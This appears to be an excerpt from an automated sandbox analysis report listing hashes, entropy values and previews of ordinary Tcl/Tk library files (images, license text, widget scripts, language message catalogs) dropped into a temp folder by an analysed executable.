                                                                                                                                                                                                                                                    Preview:GIF89a0.K.............................f.................f...ff.f3.f..33.3.........f..ff.f3.3f.33.3.f..ff.ff.f3ff333f.3f.33.33f.3......................................................................!.. -dl-.!.......,....0.K....@.pH,...GD.<:..%SR.Z......<.V.$l.....z......:.. .|v[D..f...z.W.G.Vr...NgsU.yl..qU..`.......`fe`.......Fg....(.&...g.Y.. .."..q.V.$.'.Ez.W....y...Y.U...(#Xrf.........Xux.U..........(U.4...X....G.B..t..1S...R..Y. ...l ..".>.h......,%K....A.....<s....#..8.iK.....a.y$h..DQh.PE)....6.....MyL.qzF..... ."..Y0..a......2..*t..Ma..b...M..R.....\..st..=....Q......,>s`....Qt.,..B.R.....!.$..%.....(...s...B.T...`,".h(. D....8..dC..\Q.p.......x.#A.....:..du..(D.XV......7....S.#n8a....2`...f.:G,...==(......`!..$...t....b..../N|...f..J.x... P&.|.d._!N...].1w.3D.0!....@o&H...N.B.J....pz8..w.i....=r.............@5.-!.......H."..[.j.AB<..p....h...V.D..6.h...ab1F.g...I !.V~.H..V.........:.G..|c...,.....TD5..c[.W.....LC.....FJ..71[..lH.M.....8.:$......

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\images\tai-ku.gif

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 100 x 100
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5473
                                                                                                                                                                                                                                                    Entropy (8bit):7.754239979431754
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:+EqG96vSGfyJZ26G6U1LI7nTD2enhjc+2VBnOqcUERVIim:+46KcyJI6G6uU7/LhjlkhQR7m
                                                                                                                                                                                                                                                    MD5:048AFE69735F6974D2CA7384B879820C
                                                                                                                                                                                                                                                    SHA1:267A9520C4390221DCE50177E789A4EBD590F484
                                                                                                                                                                                                                                                    SHA-256:E538F8F4934CA6E1CE29416D292171F28E67DA6C72ED9D236BA42F37445EA41E
                                                                                                                                                                                                                                                    SHA-512:201DA67A52DADA3AE7C533DE49D3C08A9465F7AA12317A0AE90A8C9C04AA69A85EC00AF2D0069023CD255DDA8768977C03C73516E4848376250E8D0D53D232CB
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:GIF89ad.d...................RJJ...B99.......RBB..B11ZBB!....R991!!...)....{{B!!R)).JJ.ss.ZZ.BB.kk.RR.JJ.BB9...JJR!!.ZZ.BB.11.99.{s.sk.kc.cZ.ZR.JB.ZR.JB.JB.RJ.B9.91.B9...{.JB.91.B9.B9.1){)!.)!.9)..ZR.JB{91.cR{1).ZJ.ZJ.RB.J9.B1.B1.9).1!....{B9.{k.scc1).kZZ)!c)!.9).B1.9).9).1!.1!.1!.B).9!.9!.1..).....{.sZ1)R)!.B1.B1.ZBR!..9).ZB.9).R9.R9.1!.J1.J1.B).B).9!.9!.1..1..).....sZ.J9.ZB.cJJ!.{1!.B).9!{)..9!.J).B!.B!.9..R1).kJ)!.B1{9).R9.cB.Z9.Z9.B).Z9.B).R1.9!.R1.J).J).B!.1..9....{.s.J9.{Z.ZB.sR.kJk1!.cB.cB.R1.R).1..B!.J!.B.....R91.J1).c.kJ.J).Z1.B!.B!..9!..{R.sJ.Z9.R1{9!..s.R9.Z...J91Z9){B)...............B91..1)!..............................RJR............B)1......R19........BJ.9B..{..s{......!.......,....d.d.@............0@PHa....*.p...7.8.y...C.s6Z.%Q.#s.`:B.N....4jd.K.0..|y....F@.......1~ ......'Y.B"C&R.V.R.4$k.3...D.......Ef*Y3..M........BDV._.....\..).]..>s..$H\%y0WL...d.......D..'..v..1Kz.Zp$;S

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\license.terms

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2208
                                                                                                                                                                                                                                                    Entropy (8bit):5.100926243789827
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:ox3uZcRTvy3DauG4+bHnr32s3eGw8YKxPiOXR3ojdS+mFf:hcFaz+bL3e8n3XR3ojdtOf
                                                                                                                                                                                                                                                    MD5:8B74B116CD5C4334D08F62B9265A482D
                                                                                                                                                                                                                                                    SHA1:D1C745B315BF5B14BBD61C002BD6BE33426EA9B4
                                                                                                                                                                                                                                                    SHA-256:4D337CAE08517060A21E404CDBACE9C4EA191E57BA0638864473F01E67C9F457
                                                                                                                                                                                                                                                    SHA-512:0E52ACED6739375F3D1A3D33333292F0DB03249AE138CCFE96437C6908D1594CA311587542FCEC5ADBC254BB5D7C1BF3976352AB86A2B23DBAB0D9BA05100470
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:This software is copyrighted by the Regents of the University of.California, Sun Microsystems, Inc., and other parties. The following.terms apply to all files associated with the software unless explicitly.disclaimed in individual files...The authors hereby grant permission to use, copy, modify, distribute,.and license this software and its documentation for any purpose, provided.that existing copyright notices are retained in all copies and that this.notice is included verbatim in any distributions. No written agreement,.license, or royalty fee is required for any of the authorized uses..Modifications to this software may be copyrighted by their authors.and need not follow the licensing terms described here, provided that.the new terms are clearly indicated on the first page of each file where.they apply...IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY.FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES.ARISING OUT OF THE USE OF THIS SOFTWARE, IT

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\listbox.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):14278
                                                                                                                                                                                                                                                    Entropy (8bit):4.889913584738437
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:ZUjtAchYusFvpgM6UFchqHjNw8wSdy+1a22YDE/q:ZLgTUBjW8RQcf
                                                                                                                                                                                                                                                    MD5:CD15965D867244614D6F930B2CBC0CA9
                                                                                                                                                                                                                                                    SHA1:3FD888D2C893E2F9FDF8FDCF91F56FB770996D51
                                                                                                                                                                                                                                                    SHA-256:F6A17CD097C2089549BB3DA431CE7F6BA0A238ADA40F7591D45961DA774687FE
                                                                                                                                                                                                                                                    SHA-512:0897B57A8BCD93BC32D8A63355C4F788ECBCD5780494CD47790C9EE26819595303765915B9862AB4D1C9B47B4804BE10C76DF7D40C3CE75582EA3A2A60CC176D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# listbox.tcl --.#.# This file defines the default bindings for Tk listbox widgets.# and provides procedures that help in implementing those bindings..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994-1995 Sun Microsystems, Inc..# Copyright (c) 1998 by Scriptics Corporation..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#--------------------------------------------------------------------------.# tk::Priv elements used in this file:.#.# afterId -..Token returned by "after" for autoscanning..# listboxPrev -..The last element to be selected or deselected.#...during a selection operation..# listboxSelection -.All of the items that were selected before the.#...current selection operation (such as a mouse.#...drag) started; used to cancel an operation..#--------------------------------------------------------------------------..#------------------------------------

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\menu.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):38042
                                                                                                                                                                                                                                                    Entropy (8bit):4.871518538014406
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:0K5IGCwGH71JtVbQDFTo06WpSCeihpzuxdyQYEuH9DAW9:0K5dWHDs69WuxdRYxHS0
                                                                                                                                                                                                                                                    MD5:302A2B300B4430E0396F6C4798A91BE2
                                                                                                                                                                                                                                                    SHA1:EAA8E790D7447F5FDBA51A684FA4E8F6A7F15210
                                                                                                                                                                                                                                                    SHA-256:FAD0BFC58C9DC718013740B8A144C494B3129C686E7CE912314429EB06A48A55
                                                                                                                                                                                                                                                    SHA-512:7FF4F213DD88D6DDD08F542EDE14D03290A588B81BEF293F22919564514DA20B066FD7D2F387667B2B23E6A1440CD57A0B9FD73C20B8C68CE09B1DD65E8DEF3C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# menu.tcl --.#.# This file defines the default bindings for Tk menus and menubuttons..# It also implements keyboard traversal of menus and implements a few.# other utility procedures related to menus..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..# Copyright (c) 1998-1999 by Scriptics Corporation..# Copyright (c) 2007 Daniel A. Steffen <das@users.sourceforge.net>.#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# Elements of tk::Priv that are used in this file:.#.# cursor -..Saves the -cursor option for the posted menubutton..# focus -..Saves the focus during a menu selection operation..#...Focus gets restored here when the menu is unposted..# grabGlobal -..Used in conjunction with tk::Priv(oldGrab): if.#...tk::Priv(oldGrab) is non-empty, then tk::Pr

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\mkpsenc.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):27195
                                                                                                                                                                                                                                                    Entropy (8bit):4.814848179189606
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:PbIvXHip4HOvtmXSckY6hwE9iM/Q9NSF7HBZ2l0K:PMXHip4HOvtmXSck5wE9iMMSHK
                                                                                                                                                                                                                                                    MD5:A9465C342EEA4655624C5330BED9FA47
                                                                                                                                                                                                                                                    SHA1:BC3B0A948F543C9365E0602099A9CB470066B725
                                                                                                                                                                                                                                                    SHA-256:C468D571980AA994F1475146E3D755F614ED4EED9B3E429557EBB722E4CA8566
                                                                                                                                                                                                                                                    SHA-512:868C3F29686429EAA3C3A25A74AD4C7805607CAA1A505464B8818150B44B6EE96CAA7E8785A452BB75483E8D3658B5B1876250D5144B4ED97908D13E7EEF9DDD
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# mkpsenc.tcl --.#.# Creates Postscript encoding vector for given encoding.# ..proc ::tk::CreatePostscriptEncoding {encoding} {. # now check for known. Even if it is known, it can be other. # than we need. GhostScript seems to be happy with such approach. set result "/CurrentEncoding \[\n". for {set i 0} {$i<256} {incr i 8} {. for {set j 0} {$j<8} {incr j} {.. set enc [encoding convertfrom $encoding [format %c [expr {$i+$j}]]].. if {[catch {format %04X [scan $enc %c]} hexcode]} {set hexcode {}}.. if [info exists ::tk::psglyphs($hexcode)] {...append result "/$::tk::psglyphs($hexcode)".. } else {...append result "/space".. }..}..append result "\n". }. append result "\] def\n". return $result.}..# List of adobe glyph names. Converted from glyphlist.txt, downloaded.# from Adobe..namespace eval ::tk {.array set psglyphs {. 0020 space. 0021 exclam. 0022 quotedbl. 0023 numbersign. 0024 dollar. 0025 percent. 0026 ampersand. 0027 quotes

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\msgbox.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:xbm image (32x, ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):17035
                                                                                                                                                                                                                                                    Entropy (8bit):4.710609471760674
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:aWsDPYblrrdc2fjAwnAVphS3OJifWMCXEcjY:an2fjAwMhDifgXt0
                                                                                                                                                                                                                                                    MD5:C157309C857AE2B6AEC5AC0E37F0D28F
                                                                                                                                                                                                                                                    SHA1:ACA7F286D579A4480728BB379492E4F241266920
                                                                                                                                                                                                                                                    SHA-256:3DE607042231819ECFB9FEAB86B23AAAF88AF9352E23D50A5560CDC1E0B55021
                                                                                                                                                                                                                                                    SHA-512:BC4038E35526201B32EDD6417C4943A27D5ABBD19ABEAABD3A3E15503C323B9731624DABBF244F0349450921A54576C661F61F2858ED176C4D9FD69D20B6561E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# msgbox.tcl --.#.#.Implements messageboxes for platforms that do not have native.#.messagebox support..#.# Copyright (c) 1994-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# Ensure existence of ::tk::dialog namespace.#.namespace eval ::tk::dialog {}..image create bitmap ::tk::dialog::b1 -foreground black \.-data "#define b1_width 32\n#define b1_height 32.static unsigned char q1_bits[] = {. 0x00, 0xf8, 0x1f, 0x00, 0x00, 0x07, 0xe0, 0x00, 0xc0, 0x00, 0x00, 0x03,. 0x20, 0x00, 0x00, 0x04, 0x10, 0x00, 0x00, 0x08, 0x08, 0x00, 0x00, 0x10,. 0x04, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00, 0x40, 0x02, 0x00, 0x00, 0x40,. 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80,. 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80,. 0x01, 0x00, 0x00, 0x80, 0x02, 0x00, 0x00, 0x40, 0x02, 0x00, 0x00, 0x40,. 0x04, 0x00, 0x00, 0x20, 0x08, 0x00,

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\msgs\cs.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4506
                                                                                                                                                                                                                                                    Entropy (8bit):4.741055603590887
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:R9gwwTNGN62C9Gq+quUa9DwvlgtnSsgPVp5QanWQfl5:Rq7TNuC9Squg9gcsgPVcS5
                                                                                                                                                                                                                                                    MD5:9A24B935D8E3F60A0947CF3F16917575
                                                                                                                                                                                                                                                    SHA1:E9DB0557F08272C2A82FDACA06D46970347B476D
                                                                                                                                                                                                                                                    SHA-256:A3419AF7BDEFCB892BF6410EC71BF95EEA2E715E9BBAC53FB93B63A3F84256CE
                                                                                                                                                                                                                                                    SHA-512:7E84420277919E9C5E38A68E76115812E95343E721A313BE350A691510BE68D4A0B5554139AF4FA681A16BB11DF11E8A7356A08463105A9712E37AF43AB34F45
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset cs "&Abort" "&P\u0159eru\u0161it". ::msgcat::mcset cs "&About..." "&O programu...". ::msgcat::mcset cs "&Blue" "&Modr\341". ::msgcat::mcset cs "&Cancel" "&Zru\u0161it". ::msgcat::mcset cs "&Clear Console" "&Smazat konzolu". ::msgcat::mcset cs "&Copy" "&Kop\355rovat". ::msgcat::mcset cs "&Delete" "&Smazat". ::msgcat::mcset cs "&Directory:" "&Adres\341\u0159:". ::msgcat::mcset cs "&Edit" "&\332pravy". ::msgcat::mcset cs "&File" "&Soubor". ::msgcat::mcset cs "&Filter" "&Filtr". ::msgcat::mcset cs "&Green" "Ze&len\341". ::msgcat::mcset cs "&Help" "&N\341pov\u011bda". ::msgcat::mcset cs "&Hide Console" "&Schovat Konzolu". ::msgcat::mcset cs "&Ignore" "&Ignorovat". ::msgcat::mcset cs "&No" "&Ne". ::msgcat::mcset cs "&OK". ::msgcat::mcset cs "&Open" "&Otev\u0159\355t". ::msgcat::mcset cs "&Quit" "&Ukon\u010dit". ::msgcat::mcset cs "&Red" "\u010ce&rven\341". ::msgcat::mcset cs "&Retry" "Z&novu

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\msgs\da.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3866
                                                                                                                                                                                                                                                    Entropy (8bit):4.605623854056765
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:G8D/jSf5s80vWC0x5kTvgXTfODYE9lAUt:G8rmB0Z0x5kTv4sbt
                                                                                                                                                                                                                                                    MD5:523DD23F26D7110CB9183AD16C837417
                                                                                                                                                                                                                                                    SHA1:BDDBE76BC0C30CFFADD1B8DB178C480E896D9B65
                                                                                                                                                                                                                                                    SHA-256:6D58D7F39876FF0A74BE833E6E8CEC8E2131152B821C6311B7D203CE340C8521
                                                                                                                                                                                                                                                    SHA-512:977AFFB43AE853D4F961FD84CC48C57794BD6FAB4BB61C12750DF7EDD910A36987BC9B830C23EB487DF7ED4452D9EDB57501E2E2FB9FDA15D822540C101071A0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset da "&Abort" "&Afbryd". ::msgcat::mcset da "&About..." "&Om...". ::msgcat::mcset da "All Files" "Alle filer". ::msgcat::mcset da "Application Error" "Programfejl". ::msgcat::mcset da "&Blue" "&Bl\u00E5". ::msgcat::mcset da "&Cancel" "&Annuller". ::msgcat::mcset da "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan ikke skifte til katalog \"%1\$s\".\nIngen rettigheder.". ::msgcat::mcset da "Choose Directory" "V\u00E6lg katalog". ::msgcat::mcset da "&Clear" "&Ryd". ::msgcat::mcset da "&Clear Console" "&Ryd konsolen". ::msgcat::mcset da "Color" "Farve". ::msgcat::mcset da "Console" "Konsol". ::msgcat::mcset da "&Copy" "&Kopier". ::msgcat::mcset da "Cu&t" "Kli&p". ::msgcat::mcset da "&Delete" "&Slet". ::msgcat::mcset da "Details >>" "Detailer". ::msgcat::mcset da "Directory \"%1\$s\" does not exist." "Katalog \"%1\$s\" findes ikke.". ::msgcat::mcset da "&Directory:" "&Katalog:".

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\msgs\de.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4150
                                                                                                                                                                                                                                                    Entropy (8bit):4.594758112169527
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:13LqlagtGIvz8MFU9RvjwKAN98qqU007Qt:6/KRrwKYtIt
                                                                                                                                                                                                                                                    MD5:139BC00416C426A552879AB5295105A0
                                                                                                                                                                                                                                                    SHA1:2C66C715E44BCB6EF6396D1197E9848FA3196F6F
                                                                                                                                                                                                                                                    SHA-256:6513BEAB8B2FF7D13D6AE1455F088AEC5EFF911288889162330DF7F70B90C9ED
                                                                                                                                                                                                                                                    SHA-512:43644BA01244BA2486DB1E75BEC325A78D7852BB319D1B4A5145E577663BC624BFD123C41F909C212D43598FDA6518486BC4D0E717BE085F7FFDA20C0FC72D19
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset de "&Abort" "&Abbruch". ::msgcat::mcset de "&About..." "&\u00dcber...". ::msgcat::mcset de "All Files" "Alle Dateien". ::msgcat::mcset de "Application Error" "Applikationsfehler". ::msgcat::mcset de "&Blue" "&Blau". ::msgcat::mcset de "&Cancel" "&Abbruch". ::msgcat::mcset de "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kann nicht in das Verzeichnis \"%1\$s\" wechseln.\nKeine Rechte vorhanden.". ::msgcat::mcset de "Choose Directory" "W\u00e4hle Verzeichnis". ::msgcat::mcset de "Cl&ear" "&R\u00fccksetzen". ::msgcat::mcset de "&Clear Console" "&Konsole l\u00f6schen". ::msgcat::mcset de "Color" "Farbe". ::msgcat::mcset de "Console" "Konsole". ::msgcat::mcset de "&Copy" "&Kopieren". ::msgcat::mcset de "Cu&t" "Aus&schneiden". ::msgcat::mcset de "&Delete" "&L\u00f6schen". ::msgcat::mcset de "Details >>". ::msgcat::mcset de "Directory \"%1\$s\" does not exist." "Das Verzeichnis \"%1\$s

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\msgs\el.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (355)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8609
                                                                                                                                                                                                                                                    Entropy (8bit):4.298043622238247
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:tCrF5o/cmSHbkI8+ETnFI3mC2hk9I+c6M30UPfMNDz9BybFkm5w+kGR8MOFiL0xc:wp5RmSHlsFerVIfM5vsam5VOQAkF
                                                                                                                                                                                                                                                    MD5:39372CE223E6F5FAF512936833AC82E2
                                                                                                                                                                                                                                                    SHA1:62A84DD84ACCAC75847BBB453CB4E1A1B0151ECE
                                                                                                                                                                                                                                                    SHA-256:5544E31148EDF7D0380425875FAC92164E577BB72D3FF054182D6B0F26EB49CF
                                                                                                                                                                                                                                                    SHA-512:55F810C46DF2E069C07FA102B88184710C6C67270DF020E7F8F753E9AC7BA3081F339E1876CC658FE92CB60CD67EB13A987BE1F3E35E627D8F325B6D5C9CE04B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:## Messages for the Greek (Hellenic - "el") language..## Please report any changes/suggestions to:.## petasis@iit.demokritos.gr..namespace eval ::tk {. ::msgcat::mcset el "&Abort" "\u03a4\u03b5\u03c1\u03bc\u03b1\u03c4\u03b9\u03c3\u03bc\u03cc\u03c2". ::msgcat::mcset el "About..." "\u03a3\u03c7\u03b5\u03c4\u03b9\u03ba\u03ac...". ::msgcat::mcset el "All Files" "\u038c\u03bb\u03b1 \u03c4\u03b1 \u0391\u03c1\u03c7\u03b5\u03af\u03b1". ::msgcat::mcset el "Application Error" "\u039b\u03ac\u03b8\u03bf\u03c2 \u0395\u03c6\u03b1\u03c1\u03bc\u03bf\u03b3\u03ae\u03c2". ::msgcat::mcset el "&Blue" "\u039c\u03c0\u03bb\u03b5". ::msgcat::mcset el "&Cancel" "\u0391\u03ba\u03cd\u03c1\u03c9\u03c3\u03b7". ::msgcat::mcset el \."Cannot change to the directory \"%1\$s\".\nPermission denied." \."\u0394\u03b5\u03bd \u03b5\u03af\u03bd\u03b1\u03b9 \u03b4\u03c5\u03bd\u03b1\u03c4\u03ae \u03b7 \u03b1\u03bb\u03bb\u03b1\u03b3\u03ae \u03ba\u

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\msgs\en.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2793
                                                                                                                                                                                                                                                    Entropy (8bit):4.232798253032259
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:sqH4qCtvLPgyqL+1ylnJzqFJHNaXSxFF4RTDuurIlnB:dYJtDPgDjnwIXSZ4RTDuTlB
                                                                                                                                                                                                                                                    MD5:BEE15DD39FA7291FA7CCBC2171BFA885
                                                                                                                                                                                                                                                    SHA1:3E6327758BA97EF3C27527AD7FADCD5252EB297B
                                                                                                                                                                                                                                                    SHA-256:B8158342926DA30F6D52AEAF5C61F68866674DA22D511770EB2C1685634A34BD
                                                                                                                                                                                                                                                    SHA-512:C9F13FF19011D7331EB3AED0EAB7B10F25CCACEC1AFB3C943F960033A8EF63819C956B02BEAF674BC6669810691DB14D155E4020C48889315711DA53A8624424
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset en "&Abort". ::msgcat::mcset en "&About...". ::msgcat::mcset en "All Files". ::msgcat::mcset en "Application Error". ::msgcat::mcset en "&Blue". ::msgcat::mcset en "&Cancel". ::msgcat::mcset en "Cannot change to the directory \"%1\$s\".\nPermission denied.". ::msgcat::mcset en "Choose Directory". ::msgcat::mcset en "Cl&ear". ::msgcat::mcset en "&Clear Console". ::msgcat::mcset en "Color". ::msgcat::mcset en "Console". ::msgcat::mcset en "&Copy". ::msgcat::mcset en "Cu&t". ::msgcat::mcset en "&Delete". ::msgcat::mcset en "Details >>". ::msgcat::mcset en "Directory \"%1\$s\" does not exist.". ::msgcat::mcset en "&Directory:". ::msgcat::mcset en "&Edit". ::msgcat::mcset en "Error: %1\$s". ::msgcat::mcset en "E&xit". ::msgcat::mcset en "&File". ::msgcat::mcset en "File \"%1\$s\" already exists.\nDo you want to overwrite it?". ::msgcat::mcset en "File \"%1\$s\" already exists.\n\n"

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\msgs\en_gb.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):63
                                                                                                                                                                                                                                                    Entropy (8bit):4.185724027617087
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:fEGp6fR1FAGoW8vMKEQXK:sooLoQO6
                                                                                                                                                                                                                                                    MD5:EC6A7E69AB0B8B767367DB54CC0499A8
                                                                                                                                                                                                                                                    SHA1:6C2D6B622429AB8C17E07C2E0F546469823ABE57
                                                                                                                                                                                                                                                    SHA-256:FB93D455A9D9CF3F822C968DFB273ED931E433F2494D71D6B5F8D83DDE7EACC2
                                                                                                                                                                                                                                                    SHA-512:72077EAB988979EB2EE292ACDB72537172A5E96B4262CE7278B76F0FEBD7E850D18221DB551D1DE3C6EB520985B5E9642936BEEB66032F920593276784525702
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset en_gb Color Colour.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\msgs\eo.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3845
                                                                                                                                                                                                                                                    Entropy (8bit):4.560432766214962
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:9714EhrzeUv0xrFf+/eR0Mqp+cIFIXd/JcrtCcuUc6Sq4Pe:97148efrF2GSMqgcIFIXdhAene
                                                                                                                                                                                                                                                    MD5:AD6C8299D63C606F46B91E55E923020A
                                                                                                                                                                                                                                                    SHA1:4E5EEF89C33B152661C7D5D74BBE54AE3C215CC8
                                                                                                                                                                                                                                                    SHA-256:ED651A2C8EEA8B373AF753C35EC7DFD91A284F2CAFCA8697985C83676D382E8B
                                                                                                                                                                                                                                                    SHA-512:F3770BB399E4EA5FC28F1A39BA850A8DACC3FB8F7661BD99F3D43F3BD5548C12E5C409840CD29256EFD40C282B614E0A76E0061C8F11EFFC6828574FEBD70D21
